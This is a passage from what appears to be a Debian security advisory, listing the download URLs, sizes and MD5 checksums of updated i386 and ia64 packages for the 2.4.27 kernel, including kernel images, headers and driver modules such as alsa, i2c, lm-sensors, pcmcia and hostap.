http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-586tsc_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 296352 1ccc246a45ea05b5733b7eba1a69565a http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-686-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12701100 b5c503e04df6ee0756abbe834428627a http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 1826896 9893d41bc9626716ffc8f0ac8f3f549c http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-k6_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 290200 c4d4abf27c6b60ddfd3ac5a59c606c82 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-build-2.4.27-4_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12098 473bb773ae15d488b121f699dffa56b1 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-686_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 302158 7b2d0e09e6ad00f0edf653d1810f2170 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-k7_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 301910 7d60a9e082623d86270d67a166097b39 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-686-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 307986 4509c907f116ad61c21d9f983f326a2f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-686-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 303734 e462e10de527040a400b86810e995824 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-386_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 271482 103a59b0692a5122061b2d88de718389 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-k7_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12108040 15b31c4c7dea644947d8a4384721ce90 http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-headers-2.4.27-speakup_2.4.27-1.1sarge6_i386.deb Size/MD5 checksum: 4774606 6d996cfb6a6c3f8b2eb0321a89cfa666 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-k6_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 301144 8b757eec3179bae66fb204de4f5174ba http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge9_i386.deb Size/MD5 checksum: 12011214 8231c58dd4849fd400a8f070521bd8db http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-686_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12357520 19f1a4541316c43aef1a620faa6cc2ce http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-k7-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 303876 8ac078f30efb4d8cecf7e64ae0d6e0fa http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-k7-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 301068 516319cf8edfb73f4eb5fc3fb0540d2e http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-386_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 301092 7ee8e4e544130eecfe219d6817b30edc http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-k7-smp_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 12439548 7a01788b6a38c1c3a631730a43cc3308 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-image-2.4.27-4-k6_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 11725900 1445c83335cde33289c5fb5e9148d269 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-headers-2.4.27-4-586tsc_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 301844 4c59df1320ef970ea80aec994d60a16c http://security.debian.org/pool/updates/main/k/kernel-image-speakup-i386/kernel-image-2.4.27-speakup_2.4.27-1.1sarge6_i386.deb Size/MD5 checksum: 11315224 3a6bb4baab15dc3cce96bc7bdb63d788 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-i386/kernel-pcmcia-modules-2.4.27-4-k7_2.4.27-10sarge7_i386.deb Size/MD5 checksum: 296146 63a8217bf1fc9c8a0e27653f99289a78 http://security.debian.org/pool/updates/main/m/mindi-kernel/mindi-kernel_2.4.27-2sarge6_i386.deb Size/MD5 checksum: 7772498 7a3c41ba3ad48e9e4f8f22bbe639b41d http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_i386.deb Size/MD5 checksum: 18060 be22201ec0c3ebab8089714b6eebfa0f http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-386_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4396 7329077b0171010fb61d5c3bc18eb306 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-586tsc_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4416 fd54e30a86bf2c6995a4e805e6ffb340 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-686_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4424 d3092f18e1ad781c7f31e25f101a21d8 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-686-smp_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4500 afd217d917c37147ae61f304e250a6fa http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k6_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4410 5d64373b3207881b0e5fe8736d4c3e00 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k7_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4404 3b5b282a073c7c1bf0e00c6e97fb7828 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4-k7-smp_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 4478 172afe01c05d84d413c730f92265d985 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-386_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1262010 a64ea693d4bdffae489155a4e4c5c044 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-586tsc_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1289138 f8ec1434fc6e9703d47e55d7caa00ffe http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-686_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1368484 9fcfeed4925900870a13319159512327 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-686-smp_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1412328 89f900f47d4e79de30b134202ed0b98a http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-k6_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1272848 e738c4ecc486884fccec945044e1de99 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-k7_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1341058 b694ff22a7474b7c3e53b3cfad4dffe8 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-3-k7-smp_1.0.8+2sarge1_i386.deb Size/MD5 checksum: 1380634 48467292dcb05f4d97c00abe264686ef http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-386_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1262528 ff0e8032f0ea8b5ea174c97a7dd20da7 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-586tsc_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1289658 01d76b0a6ab3ce4d46b313d176692686 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-686_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1369022 2c141d44bb23f0ff23fc4051a064dbe9 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-686-smp_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1412810 cc8bf0b6f778ca428dd1f2aa219898a7 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k6_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1273414 80b20a46c7db9db7f2529980ca0b428d http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k7_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1341600 5dc6b283f17aa35cfc1ea2f4f00a5805 http://security.debian.org/pool/updates/main/a/alsa-modules-i386/alsa-modules-2.4.27-4-k7-smp_1.0.8+2sarge2_i386.deb Size/MD5 checksum: 1381190 874346a5f9bbce101ce1effbb10209aa http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-386_101sarge2_i386.deb Size/MD5 checksum: 2210 94453df286d5f4e53129c9ad21c48269 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-586tsc_101sarge2_i386.deb Size/MD5 checksum: 2232 56e34da6218d5a9f5c495dbfa5b55234 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686_101sarge2_i386.deb Size/MD5 checksum: 2250 4d72f7bd505333cee3e3e6fe24b35cfc http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-686-smp_101sarge2_i386.deb Size/MD5 checksum: 2320 7e9d9c4d9e27630f3177f0ed33445958 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k6_101sarge2_i386.deb Size/MD5 checksum: 2236 9899de5f907ce3bf505230f57e8e977f http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2228 e49a7f6a1ebf9217ca427fe98bef9ef5 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2290 3656872aeedf815c3fb157e27a35aeed http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-386_101sarge2_i386.deb Size/MD5 checksum: 2180 d493e7439c2ac668aa8af8e300476a32 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-586tsc_101sarge2_i386.deb Size/MD5 checksum: 2200 99dc53e529fe3780b87ebea56bc3a9e2 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686_101sarge2_i386.deb Size/MD5 checksum: 2208 ecaf8a85eeab65f53b7cfc369e872741 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686-smp_101sarge2_i386.deb Size/MD5 checksum: 2274 a0ae0ea68ab8e0ad0b5c7ce84c648205 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k6_101sarge2_i386.deb Size/MD5 checksum: 2192 ed4d6c14605c790b4b1514479cf2a4dc http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2190 de7c785f29cfac9758d90c48c8eb5bca http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2258 e07b801edb75bff62ff274577b74e41f http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-386_101sarge2_i386.deb Size/MD5 checksum: 2200 8b295e8d54d56803114aca936edb9b3b http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-586tsc_101sarge2_i386.deb Size/MD5 checksum: 2218 6c564fa8fbe8eb3fed7547f363a5f3d3 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686_101sarge2_i386.deb Size/MD5 checksum: 2232 ca5ab5706cf7092c57853b73611ccf37 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686-smp_101sarge2_i386.deb Size/MD5 checksum: 2296 cf0ed26b54117f21c940785dd5cd6361 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k6_101sarge2_i386.deb Size/MD5 checksum: 2212 c596e89ceb9694a47531542a81618fe8 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2214 cceb0bf335f590d45b56060150be29e6 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2278 5747a8a13621d34006e02e12ddecfdf5 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-386_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77860 2412ecaf415f28cedf1594fc5853a59d http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-586tsc_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77604 c427abcb6f60c5bf1ac10bc19a65a8b8 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77592 9655842dd75143b38d9591c05c069ac7 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686-smp_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77674 f068190e67295066533fb3fff111c814 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k6_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77586 7a73742b7405143708835f3932f9fa70 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77678 0a7beec37cd1bf7ec8f1731ae9d6bb9a http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7-smp_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77734 5e4b8007c196b17ee41776406b0b8230 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-386_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77904 8e0633c48d4a196eb7d750f75bd7068a http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-586tsc_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77644 e74884dab42407313589891ff9bab2ec http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-686_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77634 8fd76652c4e0c63f65a06a596306f7e2 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-686-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77702 c33cd973e0b5f4426e1ff15c2b07bb93 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k6_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77642 de16e1b5ef4844c9b3619c6d0866a06c http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k7_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77702 fec475b02fa1569acc7a2fd254736c89 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k7-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77762 7cd84fb3f7ccac997edf9ad814f596fc http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 94012 2f7dd855a2776ace2161f61c9da880d4 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 77984 62558920315cbde876f88380f87a577d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 474474 1e8df851476f1d44b88888c9c67ea104 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-386_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258638 9dab2f0c6ca40bb6b1fa648c72dea266 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-586tsc_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258646 27ec0369b7e5710cfa9b8a2f6dc7f976 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-686_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258638 7b59494c8c7e836392ec8d29832a37f7 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-686-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 259220 1f84862f63d4b84ca52d3b0188eae27f http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k6_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258658 f44895c10b0a2a66f9f8fc2fc1c08945 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k7_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258950 fc63b5a3190378d192810b865db159d7 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k7-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 259496 acbd3d286c9f83c33075207a32297bfe http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-386_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258984 1e42dac94e18a442204e159252730d5e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-586tsc_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258980 cf019b62e65a17b0ed20e149faa44559 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258980 ed75fb59949e2364abfc9459a4832fb3 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686-smp_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259572 9505af261ada93ee26c66a3fb0d7d82e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k6_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258984 f0ca8379fd4fe3e7bd07480630d01b05 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259296 a1674fac85b1dc7aaf4e43099bf6de5c http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7-smp_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259850 b623d22abc6f054d77b7a30917f08009 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-386_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33496 dc6d281fab6c1ab610e419758fd7b895 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-586tsc_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33506 b8318c2a64dfc2ed3a6997c958d2d4a8 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-686_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33492 869083538e79481e56094549c5321cd0 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-686-smp_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33504 4683e862b99aee94cce49c7e24f4ca8d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k6_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33488 b11e22c02586f81d1ce395ae1244428e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k7_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33488 b83277fd8366c6120159be2d61c219cc http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k7-smp_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33500 84fe5e6f5efe32f98d65732bbfe658ab http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 56474 1f0f3fa67108dbde771d44446870feb1 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-386_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477610 61f0e8d1bd3dcbf8447a15f3986710ce http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-586tsc_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477644 302afa94885da8c4f143b8f5aa3476b0 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477608 0dfded776cb25f87885f3e2cd54139fb http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686-smp_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 484192 c46d1f7e98b6b3e625158ddaca907951 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k6_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477594 429eb2dd9bec9b005332f8025849f378 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477580 24ef30a122508783dc22e87a43923e45 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7-smp_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 484198 53b2e26c3a6892fe41301e31a8e91701 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-386_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477778 b11e7c242050e16293ad1163f60770cb http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-586tsc_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477780 65991feae9a3464324fb4fd9a380ef00 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-686_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477742 b5fcc0041e57a89f2497a94934ab051f http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-686-smp_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 484382 3ce4020ba4761da02bf838277169b514 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k6_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477686 7b9b7b5442441dc35b0d17f785dfce87 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k7_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477716 568d8b1052dbaff75b1d08e75b503dc9 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k7-smp_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 484410 1b0e0136ac477ad58a991da10fef9275 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-386_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 140588 4d3d9c96e4566ea0ae5b8ce33892b9f5 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-586tsc_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 153216 ec1de04dfe524ed566c9168317c7f96d http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 156142 d3d7ccde57a411d1e57fd606dac627fb http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686-smp_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 160348 3f0273700f3be9fa5430046ba227dd91 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k6_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 149216 69c40d1ebb04a5ceca0374d28ff6faa2 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 154834 49bca7c096574c6c0dbfe44db03c2cd0 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7-smp_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 158768 d31bb7bcec9ea2d123df2d9d2fc3ccff http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-386_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2446 d0f3f731301d12a7e83e0adc5e6faab5 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-586tsc_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2452 448ea77ae78b84b31074c06310abff2d http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-686_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2454 51c30ec77e9345f6eb930a2684cc72f9 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-686-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2466 630fcf555d96bbefe36adc031b1590dd http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k6_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2462 1f0c32839c6fac5010d7a37bd29ac335 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k7_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2458 fde4680c9802476653d87385f7553110 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k7-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2466 b429be79430479aa6195e9be4df2df32 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-386_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 147580 741b00a1dd08f0a3ec11807b5b5e0d21 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 164966 3608c1954937b7c2a562c5e7cec9c82a http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686-smp_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 168700 f4292765662e2f76d9a2e18af8052122 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 163394 cde18e20701333deb222482a6bacd7ab http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7-smp_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 167226 488d6c27c43fe4e6b39d3c2d8ee54be9 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-386_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 147744 f4e889628f1479ca845848c374ba94d4 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-686_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 165342 2d7a7d95cd8659cbae4a293ed5247443 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-686-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 169666 5ab7867f5d9fa479e8a8f96cd6fa9fc8 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-k7_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 163754 ac42725375d4e828b4220d84f7f92ef7 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-k7-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 168080 6dbbcfbcef54fcef4106675d84bf75c1 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8840 175694ae0a7e277237c50afe60bc0b62 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 17044422 41b3807bc4e7c2487d51784d1e6da20d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 244804 c7ddf4d27bbcc7a65f227a8f39960789 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8824 07f37c5408cec8fb777ca18746a5a1bc 